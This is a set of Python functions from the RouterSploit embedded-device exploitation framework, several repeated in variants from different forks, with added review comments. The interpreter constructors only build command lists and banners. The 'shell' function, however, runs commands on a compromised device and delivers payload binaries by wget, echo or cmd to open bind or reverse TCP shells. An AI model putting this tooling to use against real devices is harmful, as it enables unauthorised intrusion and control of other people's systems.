def __init__(self):
    """Initialise interpreter state, index the modules and build the banner.

    Starts a ``PrinterThread``, defines the command vocabularies (global
    and module commands plus the ``show`` and ``search`` sub-commands),
    indexes the available modules, and formats the start-up banner with
    one module count per top-level category.
    """
    super(RoutersploitInterpreter, self).__init__()
    PrinterThread().start()

    # No module is selected at start-up; both prompt templates begin unset.
    self.current_module = None
    self.raw_prompt_template = None
    self.module_prompt_template = None
    self.prompt_hostname = "rsf"

    self.show_sub_commands = (
        "info", "options", "advanced", "devices", "all",
        "encoders", "creds", "exploits", "scanners", "wordlists",
    )
    self.search_sub_commands = ("type", "device", "language", "payload", "vendor")

    # Presumably a trailing space marks a command that takes an argument.
    self.global_commands = sorted(("use ", "exec ", "help", "exit", "show ", "search "))
    self.module_commands = sorted(
        ["run", "back", "set ", "setg ", "check"] + self.global_commands
    )

    # Module names are dotted paths; the first component is the category
    # ("exploits", "scanners", ...) that the banner counts.
    self.modules = index_modules()
    self.modules_count = Counter(name.split('.')[0] for name in self.modules)

    # Every entry of MODULES_DIR except dunder names such as __pycache__.
    self.main_modules_dirs = [
        entry for entry in os.listdir(MODULES_DIR) if not entry.startswith("__")
    ]

    self.__parse_prompt()

    # NOTE(review): codename, version and links below are literal text; nothing
    # in this method derives them from package metadata, so the banner does not
    # identify which build is actually running.
    # NOTE(review): the literal is kept exactly as it appears in this listing.
    banner_template = """ ______ _ _____ _ _ _ | ___ \\ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_ | // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __| | |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_ \\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.4.1 Homepage : https://www.threat9.com - @threatnine Join Slack : https://www.threat9.com/slack Join Threat9 Beta Program - https://www.threat9.com Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """
    categories = ("exploits", "scanners", "creds", "generic", "payloads", "encoders")
    self.banner = banner_template.format(
        **{"{}_count".format(kind): self.modules_count[kind] for kind in categories}
    )
def __init__(self):
    """Initialise interpreter state, index the modules and build the banner.

    Starts a ``PrinterThread``, defines the command vocabularies, indexes
    the available modules, hands the command-line arguments to the
    non-interactive handler, and formats the start-up banner with one
    module count per top-level category.
    """
    super(RoutersploitInterpreter, self).__init__()
    PrinterThread().start()

    # No module is selected at start-up; both prompt templates begin unset.
    self.current_module = None
    self.raw_prompt_template = None
    self.module_prompt_template = None
    self.prompt_hostname = "rsf"

    self.show_sub_commands = (
        "info", "options", "devices", "all", "encoders",
        "creds", "exploits", "scanners", "wordlists",
    )

    # Presumably a trailing space marks a command that takes an argument.
    self.global_commands = sorted(("use ", "exec ", "help", "exit", "show ", "search "))
    self.module_commands = sorted(
        ["run", "back", "set ", "setg ", "check"] + self.global_commands
    )

    # Module names are dotted paths; the first component is the category
    # ("exploits", "scanners", ...) that the banner counts.
    self.modules = index_modules()
    self.modules_count = Counter(name.split('.')[0] for name in self.modules)

    # Every entry of MODULES_DIR except dunder names such as __pycache__.
    self.main_modules_dirs = [
        entry for entry in os.listdir(MODULES_DIR) if not entry.startswith("__")
    ]

    # The process arguments are handled during construction, before the prompt
    # and banner exist. NOTE(review): what the helper does with them is not
    # visible here -- confirm before relying on constructor side effects.
    self.__handle_if_noninteractive(sys.argv[1:])
    self.__parse_prompt()

    # NOTE(review): codename, version and links below are literal text; nothing
    # in this method derives them from package metadata, so the banner does not
    # identify which build is actually running.
    # NOTE(review): the literal is kept exactly as it appears in this listing.
    banner_template = """ ______ _ _____ _ _ _ | ___ \\ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_ | // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __| | |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_ \\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : TecnoSolution Version : 4.0.0 YouTube : https://www.youtube.com/channel/UCf9siCVepHU1juk-9YFztOg - @TecnoSolution Facebook : https://www.facebook.com/TecnoSolution2019 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """
    categories = ("exploits", "scanners", "creds", "generic", "payloads", "encoders")
    self.banner = banner_template.format(
        **{"{}_count".format(kind): self.modules_count[kind] for kind in categories}
    )
def __init__(self):
    """Initialise interpreter state, index the modules and build the banner.

    Starts a ``PrinterThread``, defines the command vocabularies, indexes
    the available modules, hands the command-line arguments to the
    non-interactive handler, and formats the start-up banner with one
    module count per top-level category.
    """
    super(RoutersploitInterpreter, self).__init__()
    PrinterThread().start()

    # No module is selected at start-up; both prompt templates begin unset.
    self.current_module = None
    self.raw_prompt_template = None
    self.module_prompt_template = None
    self.prompt_hostname = "rsf"

    self.show_sub_commands = (
        "info", "options", "devices", "all", "encoders",
        "creds", "exploits", "scanners", "wordlists",
    )

    # Presumably a trailing space marks a command that takes an argument.
    self.global_commands = sorted(("use ", "exec ", "help", "exit", "show ", "search "))
    self.module_commands = sorted(
        ["run", "back", "set ", "setg ", "check"] + self.global_commands
    )

    # Module names are dotted paths; the first component is the category
    # ("exploits", "scanners", ...) that the banner counts.
    self.modules = index_modules()
    self.modules_count = Counter(name.split('.')[0] for name in self.modules)

    # Every entry of MODULES_DIR except dunder names such as __pycache__.
    self.main_modules_dirs = [
        entry for entry in os.listdir(MODULES_DIR) if not entry.startswith("__")
    ]

    # The process arguments are handled during construction, before the prompt
    # and banner exist. NOTE(review): what the helper does with them is not
    # visible here -- confirm before relying on constructor side effects.
    self.__handle_if_noninteractive(sys.argv[1:])
    self.__parse_prompt()

    # NOTE(review): codename, version and links below are literal text; nothing
    # in this method derives them from package metadata, so the banner does not
    # identify which build is actually running.
    # NOTE(review): the literal is kept exactly as it appears in this listing.
    banner_template = """ ______ _ _____ _ _ _ | ___ \\ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_ | // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __| | |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_ \\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.4.0 Homepage : https://www.threat9.com - @threatnine Join Slack : https://www.threat9.com/slack Join Threat9 Beta Program - https://www.threat9.com Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """
    categories = ("exploits", "scanners", "creds", "generic", "payloads", "encoders")
    self.banner = banner_template.format(
        **{"{}_count".format(kind): self.modules_count[kind] for kind in categories}
    )
def get_encoders(self):
    """List the encoders indexed for ``self.architecture``.

    Returns:
        A list of ``(path, name, description)`` tuples, where ``path`` is
        ``"<architecture>/<encoder>"`` and the other two fields come from
        the encoder class's ``_Encoder__info__`` mapping.
    """
    arch = self.architecture
    marker = "encoders.{}".format(arch)
    prefix = "encoders.{}.".format(arch)

    # NOTE(review): this is a substring test, not a prefix test, so any indexed
    # name that merely contains the marker is selected as well.
    matching = [dotted for dotted in index_modules() if marker in dotted]

    rows = []
    for dotted in matching:
        short_name = dotted.replace(prefix, "").replace(".", "/")
        # Importing a module runs its top-level code, and the name comes from
        # index_modules(): whatever that index lists is executed here, so the
        # module tree has to be trusted.
        encoder_cls = getattr(importlib.import_module('routersploit.modules.' + dotted), "Encoder")
        info = encoder_cls._Encoder__info__
        rows.append(("{}/{}".format(arch, short_name), info["name"], info["description"]))
    return rows
def __init__(self):
    """Initialise interpreter state, index the modules and build the banner.

    Starts a ``PrinterThread``, defines the command vocabularies, indexes
    the available modules, hands the command-line arguments to the
    non-interactive handler, and formats the start-up banner with one
    module count per top-level category.
    """
    super(RoutersploitInterpreter, self).__init__()
    PrinterThread().start()

    # No module is selected at start-up; both prompt templates begin unset.
    self.current_module = None
    self.raw_prompt_template = None
    self.module_prompt_template = None
    self.prompt_hostname = "rsf"

    self.show_sub_commands = (
        "info", "options", "devices", "all", "encoders",
        "creds", "exploits", "scanners", "wordlists",
    )

    # Presumably a trailing space marks a command that takes an argument.
    self.global_commands = sorted(("use ", "exec ", "help", "exit", "show ", "search "))
    self.module_commands = sorted(
        ["run", "back", "set ", "setg ", "check"] + self.global_commands
    )

    # Module names are dotted paths; the first component is the category
    # ("exploits", "scanners", ...) that the banner counts.
    self.modules = index_modules()
    self.modules_count = Counter(name.split('.')[0] for name in self.modules)

    # Every entry of MODULES_DIR except dunder names such as __pycache__.
    self.main_modules_dirs = [
        entry for entry in os.listdir(MODULES_DIR) if not entry.startswith("__")
    ]

    # The process arguments are handled during construction, before the prompt
    # and banner exist. NOTE(review): what the helper does with them is not
    # visible here -- confirm before relying on constructor side effects.
    self.__handle_if_noninteractive(sys.argv[1:])
    self.__parse_prompt()

    # NOTE(review): the banner text is a literal carrying no version or origin
    # information, so it cannot be used to identify which build is running.
    # NOTE(review): the literal is kept exactly as it appears in this listing.
    banner_template = """ ______ _ _____ _ _ _ INDRO-SEKHAR-TRIDEEP | | Exploitation Framework |_| Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """
    categories = ("exploits", "scanners", "creds", "generic", "payloads", "encoders")
    self.banner = banner_template.format(
        **{"{}_count".format(kind): self.modules_count[kind] for kind in categories}
    )
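def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt bound to one exploit object.

    Reads operator input in a loop. Local commands are ``quit``/``exit``,
    ``show payloads`` and ``set payload <name>``; once a payload is
    selected, ``show options``, ``set <option> <value>``, ``run`` and
    ``back`` are also handled. While no payload is selected, any other
    input is passed to ``exploit.execute()``.

    Args:
        exploit: object providing ``execute(cmd)`` and ``target``.
        architecture: architecture name used to filter ``index_modules()``.
        method: delivery method; the code branches on "cmd", "wget" and "echo".
        payloads: collection tested against each payload class's ``cmd``
            attribute when ``method == "cmd"``.
        **params: forwarded to ``Communication``.

    Returns:
        None, once the operator enters ``quit`` or ``exit``.
    """
    available_payloads = {}
    payload = None
    options = []

    if architecture and method:
        # get all payloads for given architecture
        # str.lstrip() removes a *set of characters*, not a prefix, so
        # lstrip('payloads.') also ate the leading letters of names such as
        # "armle" or "python" and the import below then failed. Remove the
        # package prefix explicitly instead.
        all_payloads = [p.replace('payloads.', '').replace('.', '/') for p in index_modules() if "payloads.{}".format(architecture) in p]

        for p in all_payloads:
            # Importing a payload module runs its top-level code; the names come
            # from index_modules(), so the module tree has to be trusted.
            module = getattr(importlib.import_module('routersploit.modules.payloads.' + p.replace('/', '.')), 'Payload')

            # if method/arch is cmd then filter out payloads
            if method == "cmd":
                # NOTE(review): payloads defaults to None, and this membership
                # test raises TypeError on None -- confirm every caller using
                # method="cmd" passes a collection.
                if getattr(module, "cmd") in payloads:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Busy-wait until the printer queue is empty (presumably so queued
        # output is shown before the prompt). This spins a CPU core.
        while not printer_queue.empty():
            pass

        # \001 and \002 bracket the ANSI escapes so readline does not count
        # them when it measures the prompt width.
        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = []
            for p in available_payloads.keys():
                data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"]))

            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            # The startswith() check above guarantees at least three fields.
            c = cmd.split(" ")

            if c[2] in available_payloads.keys():
                payload = available_payloads[c[2]]()

                # Rebuild the option table from the payload's declared
                # attributes, leaving out "output" and "filepath".
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            # With a payload selected, input matching none of the branches
            # below is dropped without any message.
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # Only names already present in the option table can be
                    # assigned, so setattr() is limited to declared options.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                # Broad catch: any failure is reported as an
                                # invalid value and the table is left as is.
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                # NOTE(review): communication is bound only for "wget", "echo"
                # and "cmd"; any other method reaches the handler check below
                # with the name undefined -- confirm callers.
                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options, **params)

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            # Input that matched no local command is forwarded unchanged to
            # exploit.execute(), so a mistyped local command reaches the device
            # instead of being rejected.
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))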
def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt bound to one exploit object.

    Reads operator input in a loop. Local commands are ``quit``/``exit``,
    ``show payloads`` and ``set payload <name>``; once a payload is
    selected, ``show options``, ``set <option> <value>``, ``run`` and
    ``back`` are also handled. While no payload is selected, any other
    input is passed to ``exploit.execute()``.

    Args:
        exploit: object providing ``execute(cmd)`` and ``target``.
        architecture: architecture name used to filter ``index_modules()``.
        method: delivery method; the code branches on "cmd", "wget" and "echo".
        payloads: collection tested against each payload class's ``cmd``
            attribute when ``method == "cmd"``.
        **params: forwarded to ``Communication``.

    Returns:
        None, once the operator enters ``quit`` or ``exit``.
    """
    available_payloads = {}
    payload = None
    options = []

    if architecture and method:
        # Collect the indexed payloads for this architecture as "arch/name"
        # paths. The filter is a substring test on the dotted module name.
        all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p]

        for p in all_payloads:
            # Importing a payload module runs its top-level code; the names come
            # from index_modules(), so the module tree has to be trusted.
            module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload")

            # For method "cmd", keep only payloads whose cmd attribute is in
            # the payloads argument.
            if method == "cmd":
                # NOTE(review): payloads defaults to None, and this membership
                # test raises TypeError on None -- confirm every caller using
                # method="cmd" passes a collection.
                if getattr(module, "cmd") in payloads:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Busy-wait until the printer queue is empty (presumably so queued
        # output is shown before the prompt). This spins a CPU core.
        while not printer_queue.empty():
            pass

        # \001 and \002 bracket the ANSI escapes so readline does not count
        # them when it measures the prompt width.
        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = []
            for p in available_payloads.keys():
                data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"]))

            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            # The startswith() check above guarantees at least three fields.
            c = cmd.split(" ")

            if c[2] in available_payloads.keys():
                payload = available_payloads[c[2]]()

                # Rebuild the option table from the payload's declared
                # attributes, leaving out "output" and "filepath".
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            # With a payload selected, input matching none of the branches
            # below is dropped without any message.
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # Only names already present in the option table can be
                    # assigned, so setattr() is limited to declared options.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                # Broad catch: any failure is reported as an
                                # invalid value and the table is left as is.
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                # NOTE(review): communication is bound only for "wget", "echo"
                # and "cmd"; any other method reaches the handler check below
                # with the name undefined -- confirm callers.
                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options, **params)

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            # Input that matched no local command is forwarded unchanged to
            # exploit.execute(), so a mistyped local command reaches the device
            # instead of being rejected.
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))